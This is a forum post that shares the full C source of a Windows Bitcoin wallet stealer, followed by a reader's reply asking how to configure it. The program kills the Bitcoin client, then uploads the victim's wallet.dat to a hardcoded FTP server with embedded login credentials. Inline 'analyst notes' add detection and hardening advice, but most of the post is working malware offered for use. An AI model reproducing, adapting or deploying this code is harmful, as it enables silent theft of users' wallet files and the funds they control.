Bitcoin Wallet.dat FTP Stealer Source

Iniciado por ANTRAX, Abril 12, 2012, 02:45:11 PM



Abril 12, 2012, 02:45:11 PM Ultima modificación: Febrero 08, 2014, 05:45:10 PM por Expermicid
Código: c
// Coded by JuryBen
// Gimme coins
// 1LEXm6E4L9Ug9VNpkvXwJiZb61tspRiK7v

#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")

// killprocess: takes a Toolhelp snapshot and looks for the Bitcoin client
// ("bitcoin.exe", compared case-insensitively). On a name match it opens the
// process with PROCESS_TERMINATE rights and terminates it with exit code 0.
// Presumably the client is stopped so that wallet.dat is no longer held open
// before WinMain uploads it; this is inferred from the call order in WinMain.
//
// Analyst notes (detection):
//  - CreateToolhelp32Snapshot followed by OpenProcess(PROCESS_TERMINATE) and
//    TerminateProcess against a wallet client is a useful behavioural signal;
//    EDR process-access and process-termination telemetry can surface it.
//  - An unexpected exit of the wallet client shortly before outbound FTP
//    traffic from the same host is worth correlating during triage.
void killprocess()
{   

HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 ); // Get the process list snapshot.
PROCESSENTRY32 ProcessEntry = { 0 }; // Initialize the process entry structure.
ProcessEntry.dwSize = sizeof( ProcessEntry ); // Get the first process info
BOOL Return = FALSE;
Return = Process32First( hProcessSnapShot,&ProcessEntry );

// Case-insensitive comparison of the entry's executable name with the target name.
int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
if (value==0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID); //Open Process to terminate
TerminateProcess(hProcess,0);
CloseHandle(hProcess); //Close Handle }

}

while( Process32Next( hProcessSnapShot, &ProcessEntry ));
CloseHandle( hProcessSnapShot ); // Release the snapshot handle.
}

// WinMain: GUI-subsystem entry point, so no console window is shown.
// Sequence visible in this function:
//   1. killprocess() is called, then the program sleeps for 40 seconds.
//   2. A decimal string is built from rand() values seeded with the current
//      time; it is used as the remote file name for the upload.
//   3. The local path %APPDATA%\Bitcoin\wallet.dat is assembled.
//   4. A WinINet FTP session is opened with a host name, user name and
//      password embedded in the binary, and the wallet file is uploaded in
//      binary mode (FtpPutFile is called twice with the same arguments).
//   5. Both WinINet handles are closed and 0 is returned.
//
// Analyst notes (detection and mitigation):
//  - File-access telemetry: a process other than the wallet client reading
//    %APPDATA%\Bitcoin\wallet.dat.
//  - Network telemetry: outbound FTP (INTERNET_DEFAULT_FTP_PORT, i.e. TCP 21)
//    from a workstation; blocking egress FTP at the perimeter stops this
//    upload path.
//  - Static triage: the FTP host and credentials are plain string literals,
//    so string extraction from a recovered sample identifies the drop server
//    for incident response.
//  - Hardening: a wallet encrypted with a strong passphrase keeps private
//    keys protected even if the file itself is copied; keeping significant
//    funds in offline or hardware wallets removes the file from reach.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

killprocess();
Sleep(40000); // 40,000 ms delay before the file is touched
srand((unsigned)time(NULL)); // we get time to use for random seed
int seedone=rand(); // seed one
    int seedtwo=rand()*3; // seed two times 3
int seedboth = seedone + seedtwo; // combine seeds to ensure random int
// now we need to convert int to char
char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
    itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
// did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name

char* appdata = getenv("APPDATA"); //Gets %Appdata% path
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal

//ftp connection
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); // direct connection, no proxy, no user-agent string
hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "[email protected]", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass

// Upload of the local wallet file under the generated remote name, binary transfer.
FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);

InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);

return 0;
}


Autor: itz me


Hola antrax es un keyloger o un miner, como se configura.